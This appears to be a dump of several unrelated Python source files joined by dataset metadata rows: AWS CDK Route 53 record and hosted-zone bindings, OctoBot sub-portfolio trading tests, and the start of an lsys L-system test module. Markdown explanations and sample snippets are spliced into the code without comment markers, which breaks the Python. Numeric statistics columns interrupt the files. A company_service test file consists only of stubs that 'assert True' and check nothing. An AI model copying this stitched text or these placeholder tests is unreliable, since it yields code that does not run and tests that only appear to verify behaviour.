record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The NS values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = NsRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(NsRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.NsRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class NsRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a NSRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The NS values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[builtins.str]:
'''The NS values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "NsRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(IPrivateHostedZone)
class PrivateHostedZone(
HostedZone,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.PrivateHostedZone",
):
'''Create a Route53 private hosted zone for use in one or more VPCs.
Note that ``enableDnsHostnames`` and ``enableDnsSupport`` must have been enabled
for the VPC you're configuring for private hosted zones.
:resource: AWS::Route53::HostedZone
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
vpc: aws_cdk.aws_ec2.IVpc,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''
:param scope: -
:param id: -
:param vpc: A VPC that you want to associate with this hosted zone. Private hosted zones must be associated with at least one VPC. You can associate additional VPCs using ``addVpc(vpc)``.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
props = PrivateHostedZoneProps(
vpc=vpc,
zone_name=zone_name,
comment=comment,
query_logs_log_group_arn=query_logs_log_group_arn,
)
jsii.create(PrivateHostedZone, self, [scope, id, props])
@jsii.member(jsii_name="fromPrivateHostedZoneId") # type: ignore[misc]
@builtins.classmethod
def from_private_hosted_zone_id(
cls,
scope: constructs.Construct,
id: builtins.str,
private_hosted_zone_id: builtins.str,
) -> IPrivateHostedZone:
'''Import a Route 53 private hosted zone defined either outside the CDK, or in a different CDK stack.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param private_hosted_zone_id: the ID of the private hosted zone to import.
'''
return typing.cast(IPrivateHostedZone, jsii.sinvoke(cls, "fromPrivateHostedZoneId", [scope, id, private_hosted_zone_id]))
@jsii.implements(IPublicHostedZone)
class PublicHostedZone(
HostedZone,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.PublicHostedZone",
):
'''Create a Route53 public hosted zone.
:resource: AWS::Route53::HostedZone
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
caa_amazon: typing.Optional[builtins.bool] = None,
cross_account_zone_delegation_principal: typing.Optional[aws_cdk.aws_iam.IPrincipal] = None,
cross_account_zone_delegation_role_name: typing.Optional[builtins.str] = None,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''
:param scope: -
:param id: -
:param caa_amazon: Whether to create a CAA record to restrict certificate authorities allowed to issue certificates for this domain to Amazon only. Default: false
:param cross_account_zone_delegation_principal: A principal which is trusted to assume a role for zone delegation. Default: - No delegation configuration
:param cross_account_zone_delegation_role_name: The name of the role created for cross account delegation. Default: - A role name is generated automatically
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
props = PublicHostedZoneProps(
caa_amazon=caa_amazon,
cross_account_zone_delegation_principal=cross_account_zone_delegation_principal,
cross_account_zone_delegation_role_name=cross_account_zone_delegation_role_name,
zone_name=zone_name,
comment=comment,
query_logs_log_group_arn=query_logs_log_group_arn,
)
jsii.create(PublicHostedZone, self, [scope, id, props])
@jsii.member(jsii_name="fromPublicHostedZoneId") # type: ignore[misc]
@builtins.classmethod
def from_public_hosted_zone_id(
cls,
scope: constructs.Construct,
id: builtins.str,
public_hosted_zone_id: builtins.str,
) -> IPublicHostedZone:
'''Import a Route 53 public hosted zone defined either outside the CDK, or in a different CDK stack.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param public_hosted_zone_id: the ID of the public hosted zone to import.
'''
return typing.cast(IPublicHostedZone, jsii.sinvoke(cls, "fromPublicHostedZoneId", [scope, id, public_hosted_zone_id]))
@jsii.member(jsii_name="addDelegation")
def add_delegation(
self,
delegate: IPublicHostedZone,
*,
comment: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Adds a delegation from this zone to a designated zone.
:param delegate: the zone being delegated to.
:param comment: A comment to add on the DNS record created to incorporate the delegation. Default: none
:param ttl: The TTL (Time To Live) of the DNS delegation record in DNS caches. Default: 172800
'''
opts = ZoneDelegationOptions(comment=comment, ttl=ttl)
return typing.cast(None, jsii.invoke(self, "addDelegation", [delegate, opts]))
@jsii.member(jsii_name="addVpc")
def add_vpc(self, _vpc: aws_cdk.aws_ec2.IVpc) -> None:
'''Add another VPC to this private hosted zone.
:param _vpc: -
'''
return typing.cast(None, jsii.invoke(self, "addVpc", [_vpc]))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="crossAccountZoneDelegationRole")
def cross_account_zone_delegation_role(
self,
) -> typing.Optional[aws_cdk.aws_iam.Role]:
'''Role for cross account zone delegation.'''
return typing.cast(typing.Optional[aws_cdk.aws_iam.Role], jsii.get(self, "crossAccountZoneDelegationRole"))
class CaaAmazonRecord(
CaaRecord,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CaaAmazonRecord",
):
'''A DNS Amazon CAA record.
A CAA record to restrict certificate authorities allowed
to issue certificates for a domain to Amazon only.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = CaaAmazonRecordProps(
zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(CaaAmazonRecord, self, [scope, id, props])
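Route 53 stores a CAA record value in the presentation form ``flags tag "value"`` (RFC 6844). ``CaaAmazonRecord`` restricts issuance to Amazon, which corresponds to flag ``0``, tag ``issue``, and value ``amazon.com``. A hypothetical formatter for that shape (not part of this module):

```python
def format_caa_value(flag: int, tag: str, value: str) -> str:
    # The value field is quoted in Route 53's record-data syntax.
    return f'{flag} {tag} "{value}"'

print(format_caa_value(0, "issue", "amazon.com"))  # 0 issue "amazon.com"
```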
__all__ = [
"ARecord",
"ARecordProps",
"AaaaRecord",
"AaaaRecordProps",
"AddressRecordTarget",
"AliasRecordTargetConfig",
"CaaAmazonRecord",
"CaaAmazonRecordProps",
"CaaRecord",
"CaaRecordProps",
"CaaRecordValue",
"CaaTag",
"CfnDNSSEC",
"CfnDNSSECProps",
"CfnHealthCheck",
"CfnHealthCheckProps",
"CfnHostedZone",
"CfnHostedZoneProps",
"CfnKeySigningKey",
"CfnKeySigningKeyProps",
"CfnRecordSet",
"CfnRecordSetGroup",
"CfnRecordSetGroupProps",
"CfnRecordSetProps",
"CnameRecord",
"CnameRecordProps",
"CommonHostedZoneProps",
"CrossAccountZoneDelegationRecord",
"CrossAccountZoneDelegationRecordProps",
"DsRecord",
"DsRecordProps",
"HostedZone",
"HostedZoneAttributes",
"HostedZoneProps",
"HostedZoneProviderProps",
"IAliasRecordTarget",
"IHostedZone",
"IPrivateHostedZone",
"IPublicHostedZone",
"IRecordSet",
"MxRecord",
"MxRecordProps",
"MxRecordValue",
"NsRecord",
"NsRecordProps",
"PrivateHostedZone",
"PrivateHostedZoneProps",
"PublicHostedZone",
"PublicHostedZoneProps",
"RecordSet",
"RecordSetOptions",
"RecordSetProps",
"RecordTarget",
"RecordType",
"SrvRecord",
"SrvRecordProps",
"SrvRecordValue",
"TxtRecord",
"TxtRecordProps",
"VpcEndpointServiceDomainName",
"VpcEndpointServiceDomainNameProps",
"ZoneDelegationOptions",
"ZoneDelegationRecord",
"ZoneDelegationRecordProps",
]
publication.publish()
# company_service/test/server/test_app.py
] | null | null | null | def test_add_company_success():
assert True
def test_add_company_failure():
assert True
def test_update_company_success():
assert True
def test_update_company_failure():
assert True
def test_delete_company_success():
assert True
def test_delete_company_failure():
assert True
def test_list_companies_success():
assert True
def test_list_companies_failure():
assert True
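The eight placeholders above differ only in their names. If the duplication ever becomes a maintenance burden they could be generated from a table of (action, outcome) cases; the sketch below uses plain Python (no pytest dependency), and everything in it is illustrative scaffolding rather than the service's real API.

```python
# Generate the eight stub tests from a case table instead of
# writing them out by hand. Names mirror the originals above.
CASES = [
    (action, outcome)
    for action in ("add_company", "update_company",
                   "delete_company", "list_companies")
    for outcome in ("success", "failure")
]

def make_placeholder(action, outcome):
    def test():
        assert True  # same stub body as the originals
    test.__name__ = f"test_{action}_{outcome}"
    return test

generated = {f"test_{a}_{o}": make_placeholder(a, o) for a, o in CASES}
print(len(generated))  # 8
```

With pytest, the same collapse is usually done with `@pytest.mark.parametrize` once the stubs gain real bodies.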
| 13.419355 | 34 | 0.754808 | 56 | 416 | 5.178571 | 0.214286 | 0.193103 | 0.313793 | 0.410345 | 0.896552 | 0.872414 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 416 | 30 | 35 | 13.866667 | 0.857988 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e8a4430b1d01d28387db3ddd98f759d59e0451c | 13,046 | py | Python | tests/unit_tests/trading_tests/test_sub_portfolio.py | CryptoRichy/OctoBot | 1ca5bd2ba4b8fc09859518fcb2a62f74a1435019 | [
"Apache-2.0"
] | 1 | 2018-11-26T16:43:36.000Z | 2018-11-26T16:43:36.000Z | tests/unit_tests/trading_tests/test_sub_portfolio.py | CryptoRichy/OctoBot | 1ca5bd2ba4b8fc09859518fcb2a62f74a1435019 | [
"Apache-2.0"
] | null | null | null | tests/unit_tests/trading_tests/test_sub_portfolio.py | CryptoRichy/OctoBot | 1ca5bd2ba4b8fc09859518fcb2a62f74a1435019 | [
"Apache-2.0"
] | null | null | null | import ccxt
from config.cst import TraderOrderType
from tests.test_utils.config import load_test_config
from tests.test_utils.order_util import fill_market_order, fill_limit_or_stop_order
from trading.exchanges.exchange_manager import ExchangeManager
from trading.trader.order import BuyMarketOrder, OrderConstants, SellLimitOrder, BuyLimitOrder, SellMarketOrder
from trading.trader.portfolio import Portfolio
from trading.trader.sub_portfolio import SubPortfolio
from trading.trader.trader_simulator import TraderSimulator
class TestSubPortfolio:
DEFAULT_PERCENT = 0.4
@staticmethod
def init_default():
config = load_test_config()
exchange_manager = ExchangeManager(config, ccxt.binance, is_simulated=True)
exchange_inst = exchange_manager.get_exchange()
trader_inst = TraderSimulator(config, exchange_inst, 1)
portfolio_inst = Portfolio(config, trader_inst)
trader_inst.stop_order_manager()
sub_portfolio_inst = SubPortfolio(config, trader_inst, portfolio_inst, TestSubPortfolio.DEFAULT_PERCENT)
return config, portfolio_inst, exchange_inst, trader_inst, sub_portfolio_inst
def test_load_portfolio(self):
_, _, _, _, sub_portfolio_inst = self.init_default()
sub_portfolio_inst._load_portfolio()
assert sub_portfolio_inst.portfolio == {'BTC': {'available': 10 * self.DEFAULT_PERCENT,
'total': 10 * self.DEFAULT_PERCENT},
'USD': {'available': 1000 * self.DEFAULT_PERCENT,
'total': 1000 * self.DEFAULT_PERCENT}
}
def test_get_currency_portfolio(self):
_, _, _, _, sub_portfolio_inst = self.init_default()
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
def test_get_currency_multiple_sub_portfolio(self):
config, portfolio_inst, exchange_inst, trader_inst, sub_portfolio_inst = self.init_default()
sub_portfolio_inst_2 = SubPortfolio(config, trader_inst, portfolio_inst, 0.2)
sub_portfolio_inst_3 = SubPortfolio(config, trader_inst, portfolio_inst, 0.1)
sub_portfolio_inst_4 = SubPortfolio(config, trader_inst, portfolio_inst, 0.7)
assert sub_portfolio_inst_2.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * 0.2
assert sub_portfolio_inst_2.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * 0.2
assert sub_portfolio_inst_2.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
assert sub_portfolio_inst_3.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * 0.1
assert sub_portfolio_inst_3.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * 0.1
assert sub_portfolio_inst_3.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
assert sub_portfolio_inst_4.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * 0.7
assert sub_portfolio_inst_4.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * 0.7
assert sub_portfolio_inst_4.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
def test_update_portfolio_available(self):
_, portfolio_inst, _, trader_inst, sub_portfolio_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
"BTC/USD",
70,
10,
70)
# test sub
# test buy order creation
sub_portfolio_inst.update_portfolio_available(market_buy, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-700
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
# test buy order canceled --> return to init state and the update_portfolio will sync TOTAL with AVAILABLE
sub_portfolio_inst.update_portfolio_available(market_buy, False)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
# Test sell order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"BTC/USD",
60,
8,
60)
# test sub
# test sell order creation
sub_portfolio_inst.update_portfolio_available(limit_sell, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT - 8
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 2
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
# test sell order canceled --> return to init state and the update_portfolio will sync TOTAL with AVAILABLE
sub_portfolio_inst.update_portfolio_available(limit_sell, False)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
def test_update_portfolio(self):
_, portfolio_inst, _, trader_inst, sub_portfolio_inst = self.init_default()
# Test buy order
limit_buy = BuyLimitOrder(trader_inst)
limit_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_LIMIT],
"BTC/USD",
70,
10,
70)
# update portfolio with creations
sub_portfolio_inst.update_portfolio_available(limit_buy, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT - 700
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
fill_limit_or_stop_order(limit_buy, 69, 71)
sub_portfolio_inst.update_portfolio(limit_buy)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == (10 * self.DEFAULT_PERCENT)+10
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-700
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == (10 * self.DEFAULT_PERCENT) + 10
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT - 700
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 20
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 20
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 300
        # Test sell order
market_sell = SellMarketOrder(trader_inst)
market_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_MARKET],
"BTC/USD",
80,
8,
80)
# update portfolio with creations
sub_portfolio_inst.update_portfolio_available(market_sell, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10*self.DEFAULT_PERCENT + 2
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-700
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 12
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
fill_market_order(market_sell, 80)
# when filling market sell
sub_portfolio_inst.update_portfolio(market_sell)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10*self.DEFAULT_PERCENT + 2
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-60
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10*self.DEFAULT_PERCENT + 2
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000*self.DEFAULT_PERCENT-60
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 12
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 940
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 12
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 940
def test_reset_portfolio_available(self):
_, portfolio_inst, _, trader_inst, sub_portfolio_inst = self.init_default()
        # Test sell order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"BTC/USD",
90,
4,
90)
sub_portfolio_inst.update_portfolio_available(limit_sell, True)
sub_portfolio_inst.reset_portfolio_available()
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10*self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10*self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000*self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
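The assertions above all revolve around one invariant: a sub-portfolio exposes `percent` of each parent balance, and any currency it has never seen reads as zero. A stripped-down sketch of that arithmetic (class and method names here are illustrative, not OctoBot's actual API):

```python
# Toy model of the proportional bookkeeping under test.
class ToyPortfolio:
    def __init__(self, balances):
        self.balances = dict(balances)

    def get(self, currency):
        return self.balances.get(currency, 0)  # unknown currency -> 0


class ToySubPortfolio(ToyPortfolio):
    def __init__(self, parent, percent):
        # Each balance is the parent's balance scaled by `percent`.
        super().__init__({c: v * percent for c, v in parent.balances.items()})


parent = ToyPortfolio({"BTC": 10, "USD": 1000})
sub = ToySubPortfolio(parent, 0.4)  # DEFAULT_PERCENT in the tests above
print(sub.get("BTC"), sub.get("USD"), sub.get("NANO"))  # 4.0 400.0 0
```

The real tests additionally verify that order fills propagate from the sub-portfolio to the parent, which this sketch does not model.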
| 59.031674 | 119 | 0.709413 | 1,516 | 13,046 | 5.764512 | 0.063325 | 0.162147 | 0.176222 | 0.184003 | 0.853301 | 0.826067 | 0.800435 | 0.784758 | 0.763131 | 0.71713 | 0 | 0.029752 | 0.203894 | 13,046 | 220 | 120 | 59.3 | 0.81167 | 0.042159 | 0 | 0.475 | 0 | 0 | 0.024134 | 0 | 0 | 0 | 0 | 0 | 0.48125 | 1 | 0.04375 | false | 0 | 0.05625 | 0 | 0.11875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ea0428ad2da8c84a15293199146ec16872be06c | 9,181 | py | Python | lsys/tests/test_lsys.py | austinorr/lsys | 129b1af925b55cc7450efc2f4fe875225c33b578 | [
"BSD-3-Clause"
] | null | null | null | lsys/tests/test_lsys.py | austinorr/lsys | 129b1af925b55cc7450efc2f4fe875225c33b578 | [
"BSD-3-Clause"
] | 2 | 2018-10-14T00:39:28.000Z | 2018-10-14T17:35:43.000Z | lsys/tests/test_lsys.py | austinorr/lsys | 129b1af925b55cc7450efc2f4fe875225c33b578 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_lsys
----------------------------------
Tests for `lsys` module.
"""
import pytest
from contextlib import contextmanager
import lsys
result_at_depth_2 = {
'Bush1': 'FF+[+F-F-F]-[-F+F+F]FF+[+F-F-F]-[-F+F+F]+[+FF+[+F-F-F]-[-F+F+'
'F]-FF+[+F-F-F]-[-F+F+F]-FF+[+F-F-F]-[-F+F+F]]-[-FF+[+F-F-F]-[-F+F+'
'F]+FF+[+F-F-F]-[-F+F+F]+FF+[+F-F-F]-[-F+F+F]]',
'Bush2': '1.[+2.[+F]2.[-F]+F]1.[-2.[+F]2.[-F]+F]+2.[+F]2.[-F]+F',
'Crosses': 'VVFX+FX+FXFY-FY-+VFX+FX+FXFY-FY-+VFX+FX+FXFY-FY-V+FX+FXFY-F'
'Y-FY-V+FX+FXFY-FY-FY-',
'Dragon': 'FX+YF++-FX-YF+',
'Dragon45': 'L+F+R+F+L-F-R+F+L+F+R-F-L-F-R+F+L+F+R+F+L-F-R-F-L+F+R-F-L-F-R',
'Gosper': 'A-B--B+A++AA+B--+A-BB--B-A++A+B--+A-BB--B-A++A+B+A-B--B+A++A'
'A+B-++A-B--B+A++AA+B-A-B--B+A++AA+B-++A-BB--B-A++A+B-',
'Hexdragon': 'F+L+F-L-F+L+F+L+F-L-F-L-F+L+F-L-F',
'Hilbert': '+-+RF-LFL-FR+F+-LF+RFR+FL-F-LF+RFR+FL-+F+RF-LFL-FR+-F-+-LF+'
'RFR+FL-F-+RF-LFL-FR+F+RF-LFL-FR+-F-LF+RFR+FL-+F+-LF+RFR+FL-F-+RF-L'
'FL-FR+F+RF-LFL-FR+-F-LF+RFR+FL-+-F-+RF-LFL-FR+F+-LF+RFR+FL-F-LF+RF'
'R+FL-+F+RF-LFL-FR+-+',
'Penrose_Snowflake': 'F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F'
'++F4-F10-F4-F4-F10-F++F4-F++F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-'
'F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F10-F4-F4-F1'
'0-F++F4-F++F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F'
'4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F10-F4-F4-F10-F++F4-F++F4-F4-'
'F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4'
'-F4-F4-F4-F10-F++F4-F10-F4-F4-F10-F++F4-F++F4-F4-F10-F++F4-F4-F4-F'
